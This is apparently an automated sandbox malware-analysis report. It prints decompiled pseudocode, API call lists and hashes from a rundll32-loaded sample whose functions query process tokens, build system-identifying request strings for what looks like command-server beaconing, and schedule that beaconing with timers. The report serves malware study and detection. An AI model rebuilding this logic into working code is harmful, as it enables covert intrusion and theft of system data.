                                          0x047b71fd
                                          0x047b7208
                                          0x047b720a
                                          0x047b7213
                                          0x047b721b
                                          0x047b721d
                                          0x047b722f
                                          0x047b7239
                                          0x047b723d
                                          0x047b724c
                                          0x047b7250
                                          0x047b7259
                                          0x047b7261
                                          0x047b7261
                                          0x047b7263
                                          0x047b7263
                                          0x047b726b
                                          0x047b7271
                                          0x047b7275
                                          0x047b7275
                                          0x047b7280

                                          APIs
                                          • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 047B7200
                                          • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 047B7213
                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 047B722F
                                            • Part of subcall function 047B58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,047B1C51), ref: 047B58CA
                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 047B724C
                                          • memcpy.NTDLL(?,00000000,0000001C), ref: 047B7259
                                          • NtClose.NTDLL(?), ref: 047B726B
                                          • NtClose.NTDLL(00000000), ref: 047B7275
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                          • String ID:
                                          • API String ID: 2575439697-0
                                          • Opcode ID: 57b863984d5de5b40ecdf1160ae6c248c52ff7e3269e9ee352704d8c1de5b585
                                          • Instruction ID: 77b477bdd8a2ee7da7cda0fd20f8ff33631cd03c6450c21fa70d94f18b1f70f1
                                          • Opcode Fuzzy Hash: 57b863984d5de5b40ecdf1160ae6c248c52ff7e3269e9ee352704d8c1de5b585
                                          • Instruction Fuzzy Hash: C721D2B290021CBFEB019F95CD89EDEBFBDEB48740F108026FA40B6250D7759A449BE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 047B1754, Relevance: 33.2, APIs: 22, Instructions: 248memorystringCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 74%
                                          			E047B1754(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				long _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				void* _t68;
				intOrPtr _t69;
				int _t72;
				void* _t73;
				void* _t74;
				void* _t76;
				void* _t79;
				intOrPtr _t83;
				intOrPtr _t87;
				intOrPtr* _t89;
				intOrPtr _t95;
				void* _t97;
				intOrPtr _t104;
				signed int _t108;
				char** _t110;
				int _t113;
				intOrPtr* _t116;
				intOrPtr* _t118;
				intOrPtr* _t120;
				intOrPtr* _t122;
				intOrPtr _t125;
				intOrPtr _t130;
				int _t134;
				CHAR* _t136;
				intOrPtr _t137;
				void* _t138;
				void* _t147;
				int _t148;
				void* _t149;
				intOrPtr _t150;
				void* _t152;
				long _t156;
				intOrPtr* _t157;
				intOrPtr* _t158;
				intOrPtr* _t161;
				void* _t162;
				void* _t164;

				_t147 = __edx;
				_t138 = __ecx;
				_t60 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					_t60 = GetTickCount();
				}
				_t61 =  *0x47bd018; // 0x3df0b315
				asm("bswap eax");
				_t62 =  *0x47bd014; // 0x3a87c8cd
				_t136 = _a16;
				asm("bswap eax");
				_t63 =  *0x47bd010; // 0xd8d2f808
				asm("bswap eax");
				_t64 =  *0x47bd00c; // 0x8f8f86c2
				asm("bswap eax");
				_t65 =  *0x47bd2a4; // 0x24fa5a8
				_t3 = _t65 + 0x47be633; // 0x74666f73
				_t148 = wsprintfA(_t136, _t3, 3, 0x3d137, _t64, _t63, _t62, _t61,  *0x47bd02c,  *0x47bd004, _t60);
				_t68 = E047B57AB();
				_t69 =  *0x47bd2a4; // 0x24fa5a8
				_t4 = _t69 + 0x47be673; // 0x74707526
				_t72 = wsprintfA(_t148 + _t136, _t4, _t68);
				_t164 = _t162 + 0x38;
				_t149 = _t148 + _t72; // executed
				_t73 = E047B73E9(_t138); // executed
				_t137 = __imp__;
				_v8 = _t73;
				if(_t73 != 0) {
					_t130 =  *0x47bd2a4; // 0x24fa5a8
					_t7 = _t130 + 0x47be8cb; // 0x736e6426
					_t134 = wsprintfA(_a16 + _t149, _t7, _t73);
					_t164 = _t164 + 0xc;
					_t149 = _t149 + _t134;
					HeapFree( *0x47bd238, 0, _v8);
				}
				_t74 = E047B614A();
				_v8 = _t74;
				if(_t74 != 0) {
					_t125 =  *0x47bd2a4; // 0x24fa5a8
					_t11 = _t125 + 0x47be8d3; // 0x6f687726
					wsprintfA(_t149 + _a16, _t11, _t74);
					_t164 = _t164 + 0xc;
					HeapFree( *0x47bd238, 0, _v8);
				}
				_t150 =  *0x47bd324; // 0x6cb95b0
				_t76 = E047B757B(0x47bd00a, _t150 + 4);
				_t156 = 0;
				_v20 = _t76;
				if(_t76 == 0) {
					L26:
					HeapFree( *0x47bd238, _t156, _a16);
					return _v12;
				} else {
					_t79 = RtlAllocateHeap( *0x47bd238, 0, 0x800);
					_v8 = _t79;
					if(_t79 == 0) {
						L25:
						HeapFree( *0x47bd238, _t156, _v20);
						goto L26;
					}
					E047B749F(GetTickCount());
					_t83 =  *0x47bd324; // 0x6cb95b0
					__imp__(_t83 + 0x40);
					asm("lock xadd [eax], ecx");
					_t87 =  *0x47bd324; // 0x6cb95b0
					__imp__(_t87 + 0x40);
					_t89 =  *0x47bd324; // 0x6cb95b0
					_t152 = E047B4D2C(1, _t147, _a16,  *_t89);
					_v28 = _t152;
					asm("lock xadd [eax], ecx");
					if(_t152 == 0) {
						L24:
						HeapFree( *0x47bd238, _t156, _v8);
						goto L25;
					}
					StrTrimA(_t152, 0x47bc294);
					_t95 =  *0x47bd2a4; // 0x24fa5a8
					_push(_t152);
					_t18 = _t95 + 0x47be252; // 0x616d692f
					_t97 = E047B9DEF(_t18);
					_v16 = _t97;
					if(_t97 == 0) {
						L23:
						HeapFree( *0x47bd238, _t156, _t152);
						goto L24;
					}
					_t157 = __imp__;
					 *_t157(_t152, _a4);
					 *_t157(_v8, _v20);
					_t158 = __imp__;
					 *_t158(_v8, _v16);
					 *_t158(_v8, _t152);
					_t104 = E047BA5E9(0, _v8);
					_a4 = _t104;
					if(_t104 == 0) {
						_v12 = 8;
						L21:
						E047B6106();
						L22:
						HeapFree( *0x47bd238, 0, _v16);
						_t156 = 0;
						goto L23;
					}
					_t108 = E047B2F2A(_t137, 0xffffffffffffffff, _t152,  &_v24); // executed
					_v12 = _t108;
					if(_t108 == 0) {
						_t161 = _v24;
						_v12 = E047BA060(_t161, _a4, _a8, _a12);
						_t116 =  *((intOrPtr*)(_t161 + 8));
						 *((intOrPtr*)( *_t116 + 0x80))(_t116);
						_t118 =  *((intOrPtr*)(_t161 + 8));
						 *((intOrPtr*)( *_t118 + 8))(_t118);
						_t120 =  *((intOrPtr*)(_t161 + 4));
						 *((intOrPtr*)( *_t120 + 8))(_t120);
						_t122 =  *_t161;
						 *((intOrPtr*)( *_t122 + 8))(_t122);
						E047B147E(_t161);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t110 = _a8;
							if(_t110 != 0) {
								_t153 =  *_t110;
								_t159 =  *_a12;
								wcstombs( *_t110,  *_t110,  *_a12);
								_t113 = E047B1600(_t153, _t153, _t159 >> 1);
								_t152 = _v28;
								 *_a12 = _t113;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E047B147E(_a4);
							if(_v12 == 0 || _v12 == 0x10d2) {
								goto L22;
							} else {
								goto L21;
							}
						}
						_v12 = _v12 & 0x00000000;
						goto L16;
					}
				}
			}






















































                                          0x047b1754
                                          0x047b1754
                                          0x047b1754
                                          0x047b175d
                                          0x047b1766
                                          0x047b1768
                                          0x047b1768
                                          0x047b1775
                                          0x047b1780
                                          0x047b1783
                                          0x047b1788
                                          0x047b1791
                                          0x047b1794
                                          0x047b1799
                                          0x047b179c
                                          0x047b17a1
                                          0x047b17a4
                                          0x047b17b0
                                          0x047b17bd
                                          0x047b17bf
                                          0x047b17c5
                                          0x047b17ca
                                          0x047b17d5
                                          0x047b17d7
                                          0x047b17da
                                          0x047b17dc
                                          0x047b17e1
                                          0x047b17e7
                                          0x047b17ec
                                          0x047b17ef
                                          0x047b17f4
                                          0x047b1801
                                          0x047b1803
                                          0x047b1809
                                          0x047b1813
                                          0x047b1813
                                          0x047b1815
                                          0x047b181a
                                          0x047b181f
                                          0x047b1822
                                          0x047b1827
                                          0x047b1834
                                          0x047b1836
                                          0x047b1844
                                          0x047b1844
                                          0x047b1846
                                          0x047b1854
                                          0x047b1859
                                          0x047b185b
                                          0x047b1860
                                          0x047b1a2f
                                          0x047b1a39
                                          0x047b1a42
                                          0x047b1866
                                          0x047b1872
                                          0x047b1878
                                          0x047b187d
                                          0x047b1a23
                                          0x047b1a2d
                                          0x00000000
                                          0x047b1a2d
                                          0x047b1889
                                          0x047b188e
                                          0x047b1897
                                          0x047b18a8
                                          0x047b18ac
                                          0x047b18b5
                                          0x047b18bb
                                          0x047b18ca
                                          0x047b18d1
                                          0x047b18da
                                          0x047b18e0
                                          0x047b1a17
                                          0x047b1a21
                                          0x00000000
                                          0x047b1a21
                                          0x047b18ec
                                          0x047b18f2
                                          0x047b18f7
                                          0x047b18f8
                                          0x047b18ff
                                          0x047b1904
                                          0x047b1909
                                          0x047b1a0d
                                          0x047b1a15
                                          0x00000000
                                          0x047b1a15
                                          0x047b1912
                                          0x047b1919
                                          0x047b1921
                                          0x047b1926
                                          0x047b192f
                                          0x047b1935
                                          0x047b193c
                                          0x047b1941
                                          0x047b1946
                                          0x047b1a45
                                          0x047b19f9
                                          0x047b19f9
                                          0x047b19fe
                                          0x047b1a09
                                          0x047b1a0b
                                          0x00000000
                                          0x047b1a0b
                                          0x047b1950
                                          0x047b1955
                                          0x047b195a
                                          0x047b195f
                                          0x047b196f
                                          0x047b1972
                                          0x047b1978
                                          0x047b197e
                                          0x047b1984
                                          0x047b1987
                                          0x047b198d
                                          0x047b1990
                                          0x047b1995
                                          0x047b1999
                                          0x047b1999
                                          0x047b19a5
                                          0x047b19b1
                                          0x047b19b5
                                          0x047b19b7
                                          0x047b19bc
                                          0x047b19be
                                          0x047b19c3
                                          0x047b19c8
                                          0x047b19d5
                                          0x047b19dd
                                          0x047b19e0
                                          0x047b19e0
                                          0x047b19bc
                                          0x00000000
                                          0x047b19a7
                                          0x047b19ab
                                          0x047b19e2
                                          0x047b19e5
                                          0x047b19ee
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x047b19ee
                                          0x047b19ad
                                          0x00000000
                                          0x047b19ad
                                          0x047b19a5

                                          APIs
                                          • GetTickCount.KERNEL32 ref: 047B1768
                                          • wsprintfA.USER32 ref: 047B17B8
                                          • wsprintfA.USER32 ref: 047B17D5
                                          • wsprintfA.USER32 ref: 047B1801
                                          • HeapFree.KERNEL32(00000000,?), ref: 047B1813
                                          • wsprintfA.USER32 ref: 047B1834
                                          • HeapFree.KERNEL32(00000000,?), ref: 047B1844
                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 047B1872
                                          • GetTickCount.KERNEL32 ref: 047B1883
                                          • RtlEnterCriticalSection.NTDLL(06CB9570), ref: 047B1897
                                          • RtlLeaveCriticalSection.NTDLL(06CB9570), ref: 047B18B5
                                            • Part of subcall function 047B4D2C: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,047B52FE,?,06CB95B0), ref: 047B4D57
                                            • Part of subcall function 047B4D2C: lstrlen.KERNEL32(?,?,?,047B52FE,?,06CB95B0), ref: 047B4D5F
                                            • Part of subcall function 047B4D2C: strcpy.NTDLL ref: 047B4D76
                                            • Part of subcall function 047B4D2C: lstrcat.KERNEL32(00000000,?), ref: 047B4D81
                                            • Part of subcall function 047B4D2C: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,047B52FE,?,06CB95B0), ref: 047B4D9E
                                          • StrTrimA.SHLWAPI(00000000,047BC294,?,06CB95B0), ref: 047B18EC
                                            • Part of subcall function 047B9DEF: lstrlen.KERNEL32(?,00000000,00000000,047B5335,616D692F,00000000), ref: 047B9DFB
                                            • Part of subcall function 047B9DEF: lstrlen.KERNEL32(?), ref: 047B9E03
                                            • Part of subcall function 047B9DEF: lstrcpy.KERNEL32(00000000,?), ref: 047B9E1A
                                            • Part of subcall function 047B9DEF: lstrcat.KERNEL32(00000000,?), ref: 047B9E25
                                          • lstrcpy.KERNEL32(00000000,?), ref: 047B1919
                                          • lstrcpy.KERNEL32(?,?), ref: 047B1921
                                          • lstrcat.KERNEL32(?,?), ref: 047B192F
                                          • lstrcat.KERNEL32(?,00000000), ref: 047B1935
                                            • Part of subcall function 047BA5E9: lstrlen.KERNEL32(?,00000000,047BD330,00000001,047B937A,047BD00C,047BD00C,00000000,00000005,00000000,00000000,?,?,?,047B207E,?), ref: 047BA5F2
                                            • Part of subcall function 047BA5E9: mbstowcs.NTDLL ref: 047BA619
                                            • Part of subcall function 047BA5E9: memset.NTDLL ref: 047BA62B
                                          • wcstombs.NTDLL ref: 047B19C8
                                            • Part of subcall function 047BA060: SysAllocString.OLEAUT32(?), ref: 047BA09B
                                            • Part of subcall function 047B147E: HeapFree.KERNEL32(00000000,00000000,047B1D11,00000000,?,?,-00000008), ref: 047B148A
                                          • HeapFree.KERNEL32(00000000,?,?), ref: 047B1A09
                                          • HeapFree.KERNEL32(00000000,00000000,616D692F,00000000), ref: 047B1A15
                                          • HeapFree.KERNEL32(00000000,?,?,06CB95B0), ref: 047B1A21
                                          • HeapFree.KERNEL32(00000000,?), ref: 047B1A2D
                                          • HeapFree.KERNEL32(00000000,?), ref: 047B1A39
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                                          • String ID:
                                          • API String ID: 3748877296-0
                                          • Opcode ID: 6627b6dbcbb2c4d06de5731b088fd027cadd0e156a831bfc39c473f900e1a6db
                                          • Instruction ID: 77063d6ba894f775a6f876e7393b20e0138accf984999d90b458ea8ae54ca75d
                                          • Opcode Fuzzy Hash: 6627b6dbcbb2c4d06de5731b088fd027cadd0e156a831bfc39c473f900e1a6db
                                          • Instruction Fuzzy Hash: DE912471900249AFDB21AFA4DD88FDA7BB9EF08354F148464F548E7260D738ED51DBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 047B9B6F, Relevance: 16.7, APIs: 11, Instructions: 152timememoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 97 47b9b6f-47b9ba1 memset CreateWaitableTimerA 98 47b9d23-47b9d29 GetLastError 97->98 99 47b9ba7-47b9c00 _allmul SetWaitableTimer WaitForMultipleObjects 97->99 100 47b9d2d-47b9d37 98->100 101 47b9c8b-47b9c91 99->101 102 47b9c06-47b9c09 99->102 103 47b9c92-47b9c96 101->103 104 47b9c0b call 47b68cf 102->104 105 47b9c14 102->105 107 47b9c98-47b9ca0 HeapFree 103->107 108 47b9ca6-47b9caa 103->108 110 47b9c10-47b9c12 104->110 106 47b9c1e 105->106 112 47b9c22-47b9c27 106->112 107->108 108->103 111 47b9cac-47b9cb6 CloseHandle 108->111 110->105 110->106 111->100 113 47b9c3a-47b9c5d call 47b9f11 112->113 114 47b9c29-47b9c30 112->114 117 47b9c62-47b9c68 113->117 114->113 115 47b9c32 114->115 115->113 118 47b9c6a-47b9c75 117->118 119 47b9cb8-47b9cbd 117->119 118->112 122 47b9c77-47b9c87 call 47b54ac 118->122 120 47b9cbf-47b9cc5 119->120 121 47b9cdc-47b9ce4 119->121 120->101 123 47b9cc7-47b9cda call 47b6106 120->123 124 47b9cea-47b9d18 _allmul SetWaitableTimer WaitForMultipleObjects 121->124 122->101 123->124 124->112 127 47b9d1e 124->127 127->101
                                          C-Code - Quality: 83%
                                          			E047B9B6F(void* __edx, intOrPtr _a4, intOrPtr _a8) {
				void _v48;
				long _v52;
				struct %anon52 _v60;
				char _v72;
				long _v76;
				void* _v80;
				union _LARGE_INTEGER _v84;
				struct %anon52 _v92;
				void* _v96;
				void* _v100;
				union _LARGE_INTEGER _v104;
				long _v108;
				intOrPtr _v120;
				struct %anon52 _v128;
				struct %anon52 _t46;
				void* _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t60;
				long _t64;
				struct %anon52 _t65;
				void* _t68;
				void* _t72;
				signed int _t73;
				void* _t75;
				void* _t78;
				void** _t82;
				signed int _t86;
				void* _t89;

				_t75 = __edx;
				_v52 = 0;
				memset( &_v48, 0, 0x2c);
				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v60 = _t46;
				if(_t46 == 0) {
					_v92.HighPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x47bd240);
					_v76 = 0;
					_v80 = 0;
					L047BB088();
					_v84.LowPart = _t46;
					_v80 = _t75;
					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
					_t51 =  *0x47bd26c; // 0x410
					_v76 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
					_v108 = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x47bd24c = 5;
						} else {
							_t68 = E047B68CF(); // executed
							if(_t68 != 0) {
								goto L4;
							}
						}
						_v104.LowPart = 0;
						L6:
						L6:
						if(_v104.LowPart == 1 && ( *0x47bd260 & 0x00000001) == 0) {
							_v104.LowPart = 2;
						}
						_t73 = _v104.LowPart;
						_t58 = _t73 << 4;
						_t78 = _t89 + (_t73 << 4) + 0x3c;
						_t74 = _t73 + 1;
						_v92.LowPart = _t73 + 1;
						_t60 = E047B9F11(_t74, _t78, _t74, _t89 + _t58 + 0x3c, _t78,  &_v96,  &_v100); // executed
						_v128.LowPart = _t60;
						if(_t60 != 0) {
							goto L17;
						}
						_t65 = _v92;
						_v104.LowPart = _t65;
						_t97 = _t65 - 3;
						if(_t65 != 3) {
							goto L6;
						} else {
							_v120 = E047B54AC(_t74, _t97,  &_v72, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t60 - 0x10d2;
						if(_t60 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x47bd244);
							goto L21;
						} else {
							__eflags =  *0x47bd248; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t60 = E047B6106();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x47bd248);
								L21:
								L047BB088();
								_v104.LowPart = _t60;
								_v100 = _t78;
								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0);
								_t64 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
								_v128 = _t64;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t82 =  &_v72;
					_t72 = 3;
					do {
						_t54 =  *_t82;
						if(_t54 != 0) {
							HeapFree( *0x47bd238, 0, _t54);
						}
						_t82 =  &(_t82[4]);
						_t72 = _t72 - 1;
					} while (_t72 != 0);
					CloseHandle(_v80);
				}
				return _v92.HighPart;
				goto L25;
			}
































                                          0x047b9b6f
                                          0x047b9b85
                                          0x047b9b89
                                          0x047b9b8e
                                          0x047b9b95
                                          0x047b9b9b
                                          0x047b9ba1
                                          0x047b9d29
                                          0x047b9ba7
                                          0x047b9ba7
                                          0x047b9ba9
                                          0x047b9bae
                                          0x047b9baf
                                          0x047b9bb5
                                          0x047b9bb9
                                          0x047b9bbd
                                          0x047b9bcb
                                          0x047b9bd9
                                          0x047b9bdd
                                          0x047b9bdf
                                          0x047b9bec
                                          0x047b9bf8
                                          0x047b9bfa
                                          0x047b9c00
                                          0x047b9c09
                                          0x047b9c14
                                          0x047b9c14
                                          0x047b9c0b
                                          0x047b9c0b
                                          0x047b9c12
                                          0x00000000
                                          0x00000000
                                          0x047b9c12
                                          0x047b9c1e
                                          0x00000000
                                          0x047b9c22
                                          0x047b9c27
                                          0x047b9c32
                                          0x047b9c32
                                          0x047b9c3a
                                          0x047b9c45
                                          0x047b9c4d
                                          0x047b9c56
                                          0x047b9c59
                                          0x047b9c5d
                                          0x047b9c62
                                          0x047b9c68
                                          0x00000000
                                          0x00000000
                                          0x047b9c6a
                                          0x047b9c6e
                                          0x047b9c72
                                          0x047b9c75
                                          0x00000000
                                          0x047b9c77
                                          0x047b9c87
                                          0x047b9c87
                                          0x00000000
                                          0x047b9cb8
                                          0x047b9cb8
                                          0x047b9cbd
                                          0x047b9cdc
                                          0x047b9cde
                                          0x047b9ce3
                                          0x047b9ce4
                                          0x00000000
                                          0x047b9cbf
                                          0x047b9cbf
                                          0x047b9cc5
                                          0x00000000
                                          0x047b9cc7
                                          0x047b9cc7
                                          0x047b9ccc
                                          0x047b9cce
                                          0x047b9cd3
                                          0x047b9cd4
                                          0x047b9cea
                                          0x047b9cea
                                          0x047b9cf2
                                          0x047b9d00
                                          0x047b9d04
                                          0x047b9d10
                                          0x047b9d12
                                          0x047b9d16
                                          0x047b9d18
                                          0x00000000
                                          0x047b9d1e
                                          0x00000000
                                          0x047b9d1e
                                          0x047b9d18
                                          0x047b9cc5
                                          0x00000000
                                          0x047b9cbd
                                          0x047b9c8b
                                          0x047b9c8d
                                          0x047b9c91
                                          0x047b9c92
                                          0x047b9c92
                                          0x047b9c96
                                          0x047b9ca0
                                          0x047b9ca0
                                          0x047b9ca6
                                          0x047b9ca9
                                          0x047b9ca9
                                          0x047b9cb0
                                          0x047b9cb0
                                          0x047b9d37
                                          0x00000000

                                          APIs
                                          • memset.NTDLL ref: 047B9B89
                                          • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 047B9B95
                                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 047B9BBD
                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 047B9BDD
                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,047B4AC4,?), ref: 047B9BF8
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,047B4AC4,?,00000000), ref: 047B9CA0
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,047B4AC4,?,00000000,?,?), ref: 047B9CB0
                                          • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 047B9CEA
                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?,?), ref: 047B9D04
                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 047B9D10
                                            • Part of subcall function 047B68CF: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,06CB9388,00000000,?,7519F710,00000000,7519F730), ref: 047B691E
                                            • Part of subcall function 047B68CF: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,06CB93C0,?,00000000,30314549,00000014,004F0053,06CB937C), ref: 047B69BB
                                            • Part of subcall function 047B68CF: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,047B9C10), ref: 047B69CD
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,047B4AC4,?,00000000,?,?), ref: 047B9D23
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                          • String ID:
                                          • API String ID: 3521023985-0
                                          • Opcode ID: d4d67236cbd36a7f1c6c277f422e6c0c892497c198e6f9e52ae340aac5961a7d
                                          • Instruction ID: 95f12d1836655364aeceb09b4bf6ae4c52e7d4c5174ee5936eb67beb4c289401
                                          • Opcode Fuzzy Hash: d4d67236cbd36a7f1c6c277f422e6c0c892497c198e6f9e52ae340aac5961a7d
                                          • Instruction Fuzzy Hash: 85516FF1408310AFD721AF259D48EEBBBE8EF85724F508A19FAA482250D774E504CFD2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 047B1A4E, Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 74%
                                          			E047B1A4E(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L047BB082();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x47bd2a4; // 0x24fa5a8
				_t5 = _t13 + 0x47be836; // 0x6cb8dde
				_t6 = _t13 + 0x47be59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L047BAD1A();
				_t17 = CreateFileMappingW(0xffffffff, 0x47bd2a8, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}













                                          0x047b1a4e
                                          0x047b1a56
                                          0x047b1a5a
                                          0x047b1a60
                                          0x047b1a65
                                          0x047b1a6a
                                          0x047b1a6d
                                          0x047b1a70
                                          0x047b1a75
                                          0x047b1a76
                                          0x047b1a79
                                          0x047b1a7e
                                          0x047b1a85
                                          0x047b1a8f
                                          0x047b1a91
                                          0x047b1a92
                                          0x047b1a95
                                          0x047b1ab1
                                          0x047b1ab7
                                          0x047b1abb
                                          0x047b1b09
                                          0x047b1abd
                                          0x047b1aca
                                          0x047b1ada
                                          0x047b1ae2
                                          0x047b1af4
                                          0x047b1af8
                                          0x00000000
                                          0x00000000
                                          0x047b1ae4
                                          0x047b1ae7
                                          0x047b1aec
                                          0x047b1aee
                                          0x047b1aee
                                          0x047b1acc
                                          0x047b1ace
                                          0x047b1afa
                                          0x047b1afb
                                          0x047b1afb
                                          0x047b1aca
                                          0x047b1b10

                                          APIs
                                          • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,047B4996,?,?,4D283A53,?,?), ref: 047B1A5A
                                          • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 047B1A70
                                          • _snwprintf.NTDLL ref: 047B1A95
                                          • CreateFileMappingW.KERNELBASE(000000FF,047BD2A8,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 047B1AB1
                                          • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,047B4996,?,?,4D283A53,?), ref: 047B1AC3
                                          • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 047B1ADA
                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,047B4996,?,?,4D283A53), ref: 047B1AFB
                                          • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,047B4996,?,?,4D283A53,?), ref: 047B1B03
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp Download File
